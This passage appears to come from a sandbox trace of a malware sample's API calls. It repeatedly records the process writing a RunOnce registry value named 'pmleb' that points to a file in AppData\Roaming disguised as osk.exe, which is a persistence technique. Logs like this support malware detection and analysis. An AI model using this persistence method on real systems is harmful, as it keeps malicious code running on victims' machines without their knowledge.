_Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.763] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.763] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.763] RegCloseKey (hKey=0x280) returned 0x0 [0083.764] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.764] SetTimer (hWnd=0x20280, nIDEvent=0x2142, uElapse=0xa, lpTimerFunc=0x0) returned 0x2142 [0083.764] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.777] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.777] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.778] KillTimer (hWnd=0x20280, uIDEvent=0x2142) returned 1 [0083.778] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.778] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.778] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.778] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.779] RegCloseKey (hKey=0x280) returned 0x0 [0083.779] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.779] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.779] SetTimer (hWnd=0x20280, nIDEvent=0x2143, uElapse=0xa, lpTimerFunc=0x0) returned 0x2143 [0083.779] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.793] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.793] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.793] KillTimer (hWnd=0x20280, uIDEvent=0x2143) returned 1 [0083.794] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.794] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.795] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.795] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.795] RegCloseKey (hKey=0x280) returned 0x0 [0083.795] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.795] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.795] SetTimer (hWnd=0x20280, nIDEvent=0x2144, uElapse=0xa, lpTimerFunc=0x0) returned 0x2144 [0083.796] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.809] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.809] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.809] KillTimer (hWnd=0x20280, uIDEvent=0x2144) returned 1 [0083.810] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.810] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.810] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.810] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.811] RegCloseKey (hKey=0x280) returned 0x0 [0083.811] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.811] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.811] SetTimer (hWnd=0x20280, nIDEvent=0x2145, uElapse=0xa, lpTimerFunc=0x0) returned 0x2145 [0083.811] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.824] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.824] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.825] KillTimer (hWnd=0x20280, uIDEvent=0x2145) returned 1 [0083.825] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.825] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.825] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.825] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.826] RegCloseKey (hKey=0x280) returned 0x0 [0083.826] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.826] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.826] SetTimer (hWnd=0x20280, nIDEvent=0x2146, uElapse=0xa, lpTimerFunc=0x0) returned 0x2146 [0083.826] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.840] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.840] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.840] KillTimer (hWnd=0x20280, uIDEvent=0x2146) returned 1 [0083.840] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.841] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.841] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.841] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.841] RegCloseKey (hKey=0x280) returned 0x0 [0083.841] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.841] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.841] SetTimer (hWnd=0x20280, nIDEvent=0x2147, uElapse=0xa, lpTimerFunc=0x0) returned 0x2147 [0083.842] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.855] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.855] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.856] KillTimer (hWnd=0x20280, uIDEvent=0x2147) returned 1 [0083.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.856] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.856] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.857] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.857] RegCloseKey (hKey=0x280) returned 0x0 [0083.857] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.857] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.857] SetTimer (hWnd=0x20280, nIDEvent=0x2148, uElapse=0xa, lpTimerFunc=0x0) returned 0x2148 [0083.857] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.871] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.872] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.872] KillTimer (hWnd=0x20280, uIDEvent=0x2148) returned 1 [0083.872] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.872] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.872] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.873] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.873] RegCloseKey (hKey=0x280) returned 0x0 [0083.873] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.873] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.873] SetTimer (hWnd=0x20280, nIDEvent=0x2149, uElapse=0xa, lpTimerFunc=0x0) returned 0x2149 [0083.873] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.887] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.887] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.887] KillTimer (hWnd=0x20280, uIDEvent=0x2149) returned 1 [0083.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.887] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.887] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.888] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.888] RegCloseKey (hKey=0x280) returned 0x0 [0083.888] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.888] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.888] SetTimer (hWnd=0x20280, nIDEvent=0x214a, uElapse=0xa, lpTimerFunc=0x0) returned 0x214a [0083.888] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.902] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.902] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.902] KillTimer (hWnd=0x20280, uIDEvent=0x214a) returned 1 [0083.903] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.903] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.903] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.903] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.903] RegCloseKey (hKey=0x280) returned 0x0 [0083.904] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.904] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.904] SetTimer (hWnd=0x20280, nIDEvent=0x214b, uElapse=0xa, lpTimerFunc=0x0) returned 0x214b [0083.904] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.918] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.918] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.918] KillTimer (hWnd=0x20280, uIDEvent=0x214b) returned 1 [0083.918] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.919] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.919] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.919] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.919] RegCloseKey (hKey=0x280) returned 0x0 [0083.919] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.919] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.919] SetTimer (hWnd=0x20280, nIDEvent=0x214c, uElapse=0xa, lpTimerFunc=0x0) returned 0x214c [0083.919] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.933] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.934] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.934] KillTimer (hWnd=0x20280, uIDEvent=0x214c) returned 1 [0083.934] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.934] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.934] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.935] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.935] RegCloseKey (hKey=0x280) returned 0x0 [0083.935] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.935] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.935] SetTimer (hWnd=0x20280, nIDEvent=0x214d, uElapse=0xa, lpTimerFunc=0x0) returned 0x214d [0083.935] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.950] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.950] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.950] KillTimer (hWnd=0x20280, uIDEvent=0x214d) returned 1 [0083.950] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.951] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.951] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.951] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.951] RegCloseKey (hKey=0x280) returned 0x0 [0083.951] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.951] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.951] SetTimer (hWnd=0x20280, nIDEvent=0x214e, uElapse=0xa, lpTimerFunc=0x0) returned 0x214e [0083.951] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.968] KillTimer (hWnd=0x20280, uIDEvent=0x214e) returned 1 [0083.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.969] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.969] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.969] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.969] RegCloseKey (hKey=0x280) returned 0x0 [0083.969] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.969] SetTimer (hWnd=0x20280, nIDEvent=0x214f, uElapse=0xa, lpTimerFunc=0x0) returned 0x214f [0083.969] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.981] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.981] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.981] KillTimer (hWnd=0x20280, uIDEvent=0x214f) returned 1 [0083.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.982] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.982] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.982] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.982] RegCloseKey (hKey=0x280) returned 0x0 [0083.982] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.982] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.982] SetTimer (hWnd=0x20280, nIDEvent=0x2150, uElapse=0xa, lpTimerFunc=0x0) returned 0x2150 [0083.982] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.996] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.996] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.996] KillTimer (hWnd=0x20280, uIDEvent=0x2150) returned 1 [0083.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.997] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.997] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.997] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.997] RegCloseKey (hKey=0x280) returned 0x0 [0083.997] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.997] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.997] SetTimer (hWnd=0x20280, nIDEvent=0x2151, uElapse=0xa, lpTimerFunc=0x0) returned 0x2151 [0083.998] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.011] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.011] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.012] KillTimer (hWnd=0x20280, uIDEvent=0x2151) returned 1 [0084.012] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.012] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.012] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.013] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.013] RegCloseKey (hKey=0x280) returned 0x0 [0084.013] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.013] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.013] SetTimer (hWnd=0x20280, nIDEvent=0x2152, uElapse=0xa, lpTimerFunc=0x0) returned 0x2152 [0084.013] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.027] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.027] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.027] KillTimer (hWnd=0x20280, uIDEvent=0x2152) returned 1 [0084.028] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.028] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.028] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.028] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.029] RegCloseKey (hKey=0x280) returned 0x0 [0084.029] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.029] SetTimer (hWnd=0x20280, nIDEvent=0x2153, uElapse=0xa, lpTimerFunc=0x0) returned 0x2153 [0084.029] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.043] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.043] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.043] KillTimer (hWnd=0x20280, uIDEvent=0x2153) returned 1 [0084.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.044] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.044] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.044] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.044] RegCloseKey (hKey=0x280) returned 0x0 [0084.044] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.045] 